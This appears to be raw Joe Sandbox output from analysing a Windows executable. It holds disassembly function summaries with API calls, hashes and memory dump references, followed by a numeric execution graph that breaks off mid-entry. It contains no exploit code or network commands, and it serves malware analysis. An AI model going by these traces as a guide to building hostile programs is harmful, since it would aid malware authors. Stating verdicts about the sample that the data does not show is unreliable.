                                                                                                            • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                                                                            • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                                                            • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
                                                                                                            APIs
                                                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                                            • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExitMessageProcess
                                                                                                            • String ID: Error$Runtime error at 00000000$9@
                                                                                                            • API String ID: 1220098344-1503883590
                                                                                                            • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                            • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                                            • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                            • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                                            APIs
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$AllocString
                                                                                                            • String ID:
                                                                                                            • API String ID: 262959230-0
                                                                                                            • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                                            • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                                            • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                                            • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                                                                            • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CommandHandleLineModule
                                                                                                            • String ID: U1hd.@$%m
                                                                                                            • API String ID: 2123368496-1225677667
                                                                                                            • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                            • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                                            • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                            • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                                            APIs
                                                                                                            • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                            • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 730355536-0
                                                                                                            • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                                            • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                                            • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                                            • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                                                            APIs
                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue
                                                                                                            • String ID: )q@
                                                                                                            • API String ID: 3660427363-2284170586
                                                                                                            • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                                            • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                                                                            • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                                            • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2944092240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2944059631.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944124384.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2944166438.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLastSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 1458359878-0
                                                                                                            • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                                            • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                                            • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                                            • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:14.3%
                                                                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                                                                            Signature Coverage:4.5%
                                                                                                            Total number of Nodes:2000
                                                                                                            Total number of Limit Nodes:90
                                                                                                            execution_graph 52409 40cf00 52410 40cf12 52409->52410 52411 40cf0d 52409->52411 52413 406f50 CloseHandle 52411->52413 52413->52410 52414 402584 52415 402598 52414->52415 52416 4025ab 52414->52416 52444 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 52415->52444 52417 4025c2 RtlEnterCriticalSection 52416->52417 52418 4025cc 52416->52418 52417->52418 52430 4023b4 13 API calls 52418->52430 52420 40259d 52420->52416 52422 4025a1 52420->52422 52423 4025d5 52424 4025d9 52423->52424 52431 402088 52423->52431 52426 402635 52424->52426 52427 40262b RtlLeaveCriticalSection 52424->52427 52427->52426 52428 4025e5 52428->52424 52445 402210 9 API calls 52428->52445 52430->52423 52432 40209c 52431->52432 52433 4020af 52431->52433 52452 4019cc RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 52432->52452 52435 4020d0 52433->52435 52436 4020c6 RtlEnterCriticalSection 52433->52436 52441 402106 52435->52441 52446 401f94 52435->52446 52436->52435 52437 4020a1 52437->52433 52438 4020a5 52437->52438 52438->52441 52441->52428 52442 4021f1 RtlLeaveCriticalSection 52443 4021fb 52442->52443 52443->52428 52444->52420 52445->52424 52447 401fa4 52446->52447 52448 401fd0 52447->52448 52451 401ff4 52447->52451 52453 401f0c 52447->52453 52448->52451 52458 401db4 52448->52458 52451->52442 52451->52443 52452->52437 52462 40178c 52453->52462 52456 401f29 52456->52447 52459 401e02 52458->52459 52460 401dd2 52458->52460 52459->52460 52485 401d1c 52459->52485 52460->52451 52463 4017a8 52462->52463 52465 4017b2 52463->52465 52467 40180f 52463->52467 52470 401803 52463->52470 52473 4014e4 52463->52473 52482 4013e0 LocalAlloc 52463->52482 52481 401678 VirtualAlloc 52465->52481 52467->52456 52472 401e80 9 API calls 52467->52472 52469 4017be 52469->52467 52483 4015c0 VirtualFree 52470->52483 52472->52456 52474 4014f3 VirtualAlloc 52473->52474 52476 401520 52474->52476 52477 401543 52474->52477 52484 401398 LocalAlloc 52476->52484 52477->52463 52479 40152c 52479->52477 52480 401530 VirtualFree 52479->52480 52480->52477 52481->52469 52482->52463 52483->52467 52484->52479 52486 401d2e 52485->52486 52487 401d51 52486->52487 52488 401d63 52486->52488 52498 401940 52487->52498 52490 401940 3 API calls 52488->52490 52491 401d61 52490->52491 52492 401d79 52491->52492 52508 401bf8 9 API calls 52491->52508 52492->52460 52494 401d88 52495 401da2 52494->52495 52509 401c4c 9 API calls 52494->52509 52510 401454 LocalAlloc 52495->52510 52499 401966 52498->52499 52507 4019bf 52498->52507 52511 40170c 52499->52511 52503 401983 52505 40199a 52503->52505 52516 4015c0 VirtualFree 52503->52516 52505->52507 52517 401454 LocalAlloc 52505->52517 52507->52491 52508->52494 52509->52495 52510->52492 52514 401743 52511->52514 52512 401783 52515 4013e0 LocalAlloc 52512->52515 52513 40175d VirtualFree 52513->52514 52514->52512 52514->52513 52515->52503 52516->52505 52517->52507 52518 2391070 52519 239107c 52518->52519 52521 2391084 52518->52521 52520 2391092 52521->52520 52524 45cff4 52521->52524 52525 45d003 52524->52525 52526 45d037 VirtualAlloc 52525->52526 52530 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52525->52530 52528 45d04f 52526->52528 52529 45d032 52529->52526 52530->52529 52531 41364c SetWindowLongA GetWindowLongA 52532 4136a9 SetPropA SetPropA 52531->52532 52533 41368b GetWindowLongA 52531->52533 52537 41f3ac 52532->52537 52533->52532 52534 41369a SetWindowLongA 52533->52534 52534->52532 52542 415280 52537->52542 52549 423c1c 52537->52549 52643 423a94 52537->52643 52538 4136f9 52543 41528d 52542->52543 52544 4152f3 52543->52544 52545 4152e8 52543->52545 52548 4152f1 52543->52548 52650 424b9c 13 API calls 52544->52650 52545->52548 52651 41506c 46 API calls 52545->52651 52548->52538 52552 423c52 52549->52552 52570 423c73 52552->52570 52652 423b78 52552->52652 52553 423cfc 52555 423d03 52553->52555 52556 423d37 52553->52556 52554 423c9d 52557 423ca3 52554->52557 52558 423d60 52554->52558 52565 423d09 52555->52565 52602 423fc1 52555->52602 52561 423d42 52556->52561 52562 4240aa IsIconic 52556->52562 52559 423cd5 52557->52559 52560 423ca8 52557->52560 52563 423d72 52558->52563 52564 423d7b 52558->52564 52559->52570 52591 423cee 52559->52591 52592 423e4f 52559->52592 52566 423e06 52560->52566 52567 423cae 52560->52567 52568 4240e6 52561->52568 52569 423d4b 52561->52569 52562->52570 52574 4240be GetFocus 52562->52574 52571 423d88 52563->52571 52572 423d79 52563->52572 52667 4241a4 11 API calls 52564->52667 52575 423f23 SendMessageA 52565->52575 52576 423d17 52565->52576 52680 423b94 NtdllDefWindowProc_A 52566->52680 52577 423cb7 52567->52577 52578 423e2e PostMessageA 52567->52578 52700 424860 WinHelpA PostMessageA 52568->52700 52581 4240fd 52569->52581 52600 423cd0 52569->52600 52570->52538 52668 4241ec IsIconic 52571->52668 52676 423b94 NtdllDefWindowProc_A 52572->52676 52574->52570 52583 4240cf 52574->52583 52575->52570 52576->52570 52576->52600 52621 423f66 52576->52621 52586 423cc0 52577->52586 52587 423eb5 52577->52587 52686 423b94 NtdllDefWindowProc_A 52578->52686 52589 424106 52581->52589 52590 42411b 52581->52590 52699 41f004 GetCurrentThreadId 73A25940 52583->52699 52595 423cc9 52586->52595 52596 423dde IsIconic 52586->52596 52597 423ebe 52587->52597 52598 423eef 52587->52598 52588 423e49 52588->52570 52701 4244e4 52589->52701 52707 42453c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 52590->52707 52591->52600 52601 423e1b 52591->52601 52656 423b94 NtdllDefWindowProc_A 52592->52656 52594 4240d6 52594->52570 52605 4240de SetFocus 52594->52605 52595->52600 52606 423da1 52595->52606 52608 423dfa 52596->52608 52609 423dee 52596->52609 52607 423b24 5 API calls 52597->52607 52663 423b94 NtdllDefWindowProc_A 52598->52663 52600->52570 52666 423b94 NtdllDefWindowProc_A 52600->52666 52681 424188 52601->52681 52602->52570 52615 423fe7 IsWindowEnabled 52602->52615 52605->52570 52606->52570 52677 422c5c ShowWindow PostMessageA PostQuitMessage 52606->52677 52614 423ec6 52607->52614 52679 423b94 NtdllDefWindowProc_A 52608->52679 52678 423bd0 15 API calls 52609->52678 52613 423e55 52619 423e93 52613->52619 52620 423e71 52613->52620 52625 423ed8 52614->52625 52687 41ef68 52614->52687 52615->52570 52626 423ff5 52615->52626 52618 423ef5 52627 423f0d 52618->52627 52664 41eeb4 GetCurrentThreadId 73A25940 52618->52664 52623 423a94 6 API calls 52619->52623 52657 423b24 52620->52657 52621->52570 52628 423f88 IsWindowEnabled 52621->52628 52630 423e9b PostMessageA 52623->52630 52693 423b94 NtdllDefWindowProc_A 52625->52693 52636 423ffc IsWindowVisible 52626->52636 52634 423a94 6 API calls 52627->52634 52628->52570 52635 423f96 52628->52635 52630->52570 52634->52570 52694 412320 7 API calls 52635->52694 52636->52570 52638 42400a GetFocus 52636->52638 52695 4181f0 52638->52695 52640 42401f SetFocus 52697 415250 52640->52697 52644 423b1d 52643->52644 52645 423aa4 52643->52645 52644->52538 52645->52644 52646 423aaa EnumWindows 52645->52646 52646->52644 52647 423ac6 GetWindow GetWindowLongA 52646->52647 52839 423a2c GetWindow 52646->52839 52648 423ae5 52647->52648 52648->52644 52649 423b11 SetWindowPos 52648->52649 52649->52644 52649->52648 52650->52548 52651->52548 52653 423b82 52652->52653 52654 423b8d 52652->52654 52653->52654 52708 408728 GetSystemDefaultLCID 52653->52708 52654->52553 52654->52554 52656->52613 52658 423b72 PostMessageA 52657->52658 52659 423b33 52657->52659 52658->52570 52659->52658 52660 423b6a 52659->52660 52662 423b5e SetWindowPos 52659->52662 52811 40b3d8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52660->52811 52662->52659 52662->52660 52663->52618 52665 41ef39 52664->52665 52665->52627 52666->52570 52667->52570 52669 4241fd SetActiveWindow 52668->52669 52673 424233 52668->52673 52812 42365c 52669->52812 52672 423b24 5 API calls 52674 42421a 52672->52674 52673->52570 52674->52673 52675 42422d SetFocus 52674->52675 52675->52673 52676->52570 52677->52570 52678->52570 52679->52570 52680->52570 52824 41db40 52681->52824 52684 4241a0 52684->52570 52685 424194 LoadIconA 52685->52684 52686->52588 52688 41ef70 IsWindow 52687->52688 52689 41ef9c 52687->52689 52690 41ef7f EnableWindow 52688->52690 52692 41ef8a 52688->52692 52689->52625 52690->52692 52691 402660 4 API calls 52691->52692 52692->52688 52692->52689 52692->52691 52693->52570 52694->52570 52696 4181fa 52695->52696 52696->52640 52698 41526b SetFocus 52697->52698 52698->52570 52699->52594 52700->52588 52702 4244f0 52701->52702 52703 42450a 52701->52703 52704 4244f7 SendMessageA 52702->52704 52706 42451f 52702->52706 52705 402648 4 API calls 52703->52705 52704->52706 52705->52706 52706->52570 52707->52588 52763 408570 GetLocaleInfoA 52708->52763 52713 408570 5 API calls 52714 40877d 52713->52714 52715 408570 5 API calls 52714->52715 52716 4087a1 52715->52716 52775 4085bc GetLocaleInfoA 52716->52775 52719 4085bc GetLocaleInfoA 52720 4087d1 52719->52720 52721 408570 5 API calls 52720->52721 52722 4087eb 52721->52722 52723 4085bc GetLocaleInfoA 52722->52723 52724 408808 52723->52724 52725 408570 5 API calls 52724->52725 52726 408822 52725->52726 52727 403450 4 API calls 52726->52727 52728 40882f 52727->52728 52729 408570 5 API calls 52728->52729 52730 408844 52729->52730 52731 403450 4 API calls 52730->52731 52732 408851 52731->52732 52733 4085bc GetLocaleInfoA 52732->52733 52734 40885f 52733->52734 52735 408570 5 API calls 52734->52735 52736 408879 52735->52736 52737 403450 4 API calls 52736->52737 52738 408886 52737->52738 52739 408570 5 API calls 52738->52739 52740 40889b 52739->52740 52764 408597 52763->52764 52765 4085a9 52763->52765 52791 4034e0 52764->52791 52767 403494 4 API calls 52765->52767 52768 4085a7 52767->52768 52769 403450 52768->52769 52770 403454 52769->52770 52773 403464 52769->52773 52772 4034bc 4 API calls 52770->52772 52770->52773 52771 403490 52771->52713 52772->52773 52773->52771 52806 402660 52773->52806 52776 4085d8 52775->52776 52776->52719 52796 4034bc 52791->52796 52793 4034f0 52794 403400 4 API calls 52793->52794 52795 403508 52794->52795 52795->52768 52797 4034c0 52796->52797 52798 4034dc 52796->52798 52801 402648 52797->52801 52798->52793 52800 4034c9 52800->52793 52802 40264c 52801->52802 52803 402656 52801->52803 52802->52803 52805 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52802->52805 52803->52800 52803->52803 52805->52803 52807 402664 52806->52807 52808 40266e 52806->52808 52807->52808 52810 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52807->52810 52808->52771 52808->52808 52810->52808 52811->52658 52820 423608 SystemParametersInfoA 52812->52820 52815 423675 ShowWindow 52817 423680 52815->52817 52818 423687 52815->52818 52823 423638 SystemParametersInfoA 52817->52823 52818->52672 52821 423626 52820->52821 52821->52815 52822 423638 SystemParametersInfoA 52821->52822 52822->52815 52823->52818 52827 41db64 52824->52827 52828 41db4a 52827->52828 52829 41db71 52827->52829 52828->52684 52828->52685 52829->52828 52836 40cc80 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 52829->52836 52831 41db8e 52831->52828 52832 41dba8 52831->52832 52833 41db9b 52831->52833 52837 41bd9c 11 API calls 52832->52837 52838 41b398 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 52833->52838 52836->52831 52837->52828 52838->52828 52840 423a4d GetWindowLongA 52839->52840 52841 423a59 52839->52841 52840->52841 52842 490c98 52843 490ccc 52842->52843 52844 490cce 52843->52844 52845 490ce2 52843->52845 52988 4467f0 18 API calls 52844->52988 52848 490d1e 52845->52848 52849 490cf1 52845->52849 52847 490cd7 Sleep 52909 490d55 52847->52909 52854 490d5a 52848->52854 52855 490d2d 52848->52855 52851 44684c 18 API calls 52849->52851 52853 490d00 52851->52853 52857 490d08 FindWindowA 52853->52857 52860 490d69 52854->52860 52861 490db0 52854->52861 52978 44684c 52855->52978 52859 446acc 5 API calls 52857->52859 52858 490d3a 52862 490d42 FindWindowA 52858->52862 52889 490d19 52859->52889 52989 4467f0 18 API calls 52860->52989 52866 490e0c 52861->52866 52867 490dbf 52861->52867 52982 446acc 52862->52982 52865 490d75 52990 4467f0 18 API calls 52865->52990 52874 490e1b 52866->52874 52880 490e68 52866->52880 52993 4467f0 18 API calls 52867->52993 52869 490d82 52991 4467f0 18 API calls 52869->52991 52872 490dcb 52994 4467f0 18 API calls 52872->52994 52873 490d8f 52992 4467f0 18 API calls 52873->52992 52998 4467f0 18 API calls 52874->52998 52878 490dd8 52995 4467f0 18 API calls 52878->52995 52879 490d9a SendMessageA 52884 446acc 5 API calls 52879->52884 52885 490ea2 52880->52885 52886 490e77 52880->52886 52881 490e27 52999 4467f0 18 API calls 52881->52999 52883 490de5 52996 4467f0 18 API calls 52883->52996 52884->52889 52895 490eb1 52885->52895 52896 490ef0 52885->52896 52890 44684c 18 API calls 52886->52890 52889->52909 52893 490e84 52890->52893 52891 490e34 53000 4467f0 18 API calls 52891->53000 52892 490df0 PostMessageA 52997 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52892->52997 52900 490e8c RegisterClipboardFormatA 52893->52900 53003 4467f0 18 API calls 52895->53003 52907 490eff 52896->52907 52908 490f44 52896->52908 52898 490e41 53001 4467f0 18 API calls 52898->53001 52904 446acc 5 API calls 52900->52904 52902 490e4c SendNotifyMessageA 53002 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52902->53002 52903 490ebd 53004 4467f0 18 API calls 52903->53004 52904->52909 53006 4467f0 18 API calls 52907->53006 52915 490f98 52908->52915 52916 490f53 52908->52916 53028 403420 52909->53028 52910 490eca 53005 4467f0 18 API calls 52910->53005 52913 490f0b 53007 4467f0 18 API calls 52913->53007 52914 490ed5 SendMessageA 52919 446acc 5 API calls 52914->52919 52924 490ffa 52915->52924 52925 490fa7 52915->52925 53010 4467f0 18 API calls 52916->53010 52918 490f18 53008 4467f0 18 API calls 52918->53008 52919->52889 52922 490f5f 53011 4467f0 18 API calls 52922->53011 52923 490f23 PostMessageA 53009 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52923->53009 52932 491009 52924->52932 52933 491081 52924->52933 52928 44684c 18 API calls 52925->52928 52930 490fb4 52928->52930 52929 490f6c 53012 4467f0 18 API calls 52929->53012 53014 42e2bc SetErrorMode 52930->53014 52936 44684c 18 API calls 52932->52936 52943 491090 52933->52943 52944 4910b6 52933->52944 52935 490f77 SendNotifyMessageA 53013 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52935->53013 52939 491018 52936->52939 52937 490fc1 52940 490fd7 GetLastError 52937->52940 52941 490fc7 52937->52941 53017 4467f0 18 API calls 52939->53017 52945 446acc 5 API calls 52940->52945 52942 446acc 5 API calls 52941->52942 52946 490fd5 52942->52946 53022 4467f0 18 API calls 52943->53022 52951 4910e8 52944->52951 52952 4910c5 52944->52952 52945->52946 52950 446acc 5 API calls 52946->52950 52949 49109a FreeLibrary 53023 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52949->53023 52950->52909 52961 4910f7 52951->52961 52967 49112b 52951->52967 52955 44684c 18 API calls 52952->52955 52953 49102b GetProcAddress 52956 491071 52953->52956 52957 491037 52953->52957 52958 4910d1 52955->52958 53021 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52956->53021 53018 4467f0 18 API calls 52957->53018 52963 4910d9 CreateMutexA 52958->52963 53024 48ae84 18 API calls 52961->53024 52962 491043 53019 4467f0 18 API calls 52962->53019 52963->52909 52966 491050 52970 446acc 5 API calls 52966->52970 52967->52909 53026 48ae84 18 API calls 52967->53026 52969 491103 52971 491114 OemToCharBuffA 52969->52971 52972 491061 52970->52972 53025 48ae9c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52971->53025 53020 446924 LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52972->53020 52975 491146 52976 491157 CharToOemBuffA 52975->52976 53027 48ae9c LocalAlloc TlsSetValue TlsGetValue TlsGetValue VariantClear 52976->53027 52979 446854 52978->52979 53032 4358cc 52979->53032 52981 446873 52981->52858 52983 446ad4 52982->52983 53058 435c34 VariantClear 52983->53058 52985 446af7 52986 446b0e 52985->52986 53059 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 52985->53059 52986->52909 52988->52847 52989->52865 52990->52869 52991->52873 52992->52879 52993->52872 52994->52878 52995->52883 52996->52892 52997->52889 52998->52881 52999->52891 53000->52898 53001->52902 53002->52909 53003->52903 53004->52910 53005->52914 53006->52913 53007->52918 53008->52923 53009->52889 53010->52922 53011->52929 53012->52935 53013->52909 53060 403738 53014->53060 53017->52953 53018->52962 53019->52966 53020->52889 53021->52889 53022->52949 53023->52909 53024->52969 53025->52909 53026->52975 53027->52909 53029 403426 53028->53029 53030 40344b 53029->53030 53031 402660 4 API calls 53029->53031 53031->53029 53033 4358d8 53032->53033 53034 4358fa 53032->53034 53033->53034 53052 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53033->53052 53035 43597d 53034->53035 53037 435941 53034->53037 53038 435971 53034->53038 53039 435965 53034->53039 53040 43594d 53034->53040 53049 435959 53034->53049 53057 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53035->53057 53053 403510 53037->53053 53056 4040e8 18 API calls 53038->53056 53044 403494 4 API calls 53039->53044 53043 403510 4 API calls 53040->53043 53048 435956 53043->53048 53050 43596e 53044->53050 53047 43598e 53047->52981 53048->52981 53049->52981 53050->52981 53051 43597a 53051->52981 53052->53034 53054 4034e0 4 API calls 53053->53054 53055 40351d 53054->53055 53055->52981 53056->53051 53057->53047 53058->52985 53059->52986 53061 40373c LoadLibraryA 53060->53061 53061->52937 53062 416b52 53063 416bfa 53062->53063 53064 416b6a 53062->53064 53081 41532c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53063->53081 53066 416b84 SendMessageA 53064->53066 53067 416b78 53064->53067 53068 416bd8 53066->53068 53069 416b82 CallWindowProcA 53067->53069 53070 416b9e 53067->53070 53069->53068 53078 41a068 GetSysColor 53070->53078 53073 416ba9 SetTextColor 53074 416bbe 53073->53074 53079 41a068 GetSysColor 53074->53079 53076 416bc3 SetBkColor 53080 41a6f0 GetSysColor CreateBrushIndirect 53076->53080 53078->53073 53079->53076 53080->53068 53081->53068 53082 416654 53083 416661 53082->53083 53084 4166bb 53082->53084 53089 416560 CreateWindowExA 53083->53089 53085 